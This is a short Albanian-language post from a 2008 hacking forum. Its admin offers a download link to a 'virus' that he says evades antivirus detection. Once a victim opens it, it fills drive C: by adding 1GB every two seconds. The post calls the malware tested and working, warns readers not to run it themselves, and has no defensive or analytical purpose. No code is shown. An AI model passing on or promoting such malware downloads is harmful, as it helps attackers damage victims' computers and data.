T1naa-Hack

Mir Se Vini
 
ForumForum  PortalPortal  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Krdnj` Virus qe behet 1Gb per 2 sec

Shko poshtė 
AutoriMesazh
T1naa-hack
Admin


Numri i postimeve : 68
Age : 24
Registration date : 03/04/2008

MesazhTitulli: Krdnj` Virus qe behet 1Gb per 2 sec   Wed Apr 09 2008, 12:40

Nuk DETEKTOHET nga ANTIVIRUSI.

Kur e hap viktima kete virus atehere krijohet nje file ne diskun C:/ dhe ai file cdo dy SECONDA e shton nga 1Gb. Me besoni, eshte i provuar dhe punon

KUJDES MOS E HAPNI NE KOMPJUTERIN TUAJ SE NUK JAP PERGJEGJESI

Download:

http://www.speedyshare.com/834719212.html
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://t1naa-hack.net
 
Krdnj` Virus qe behet 1Gb per 2 sec
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
T1naa-Hack :: Your first category :: Your first forum :: ......::|| Hacking & Security ||::......-
Kėrce tek: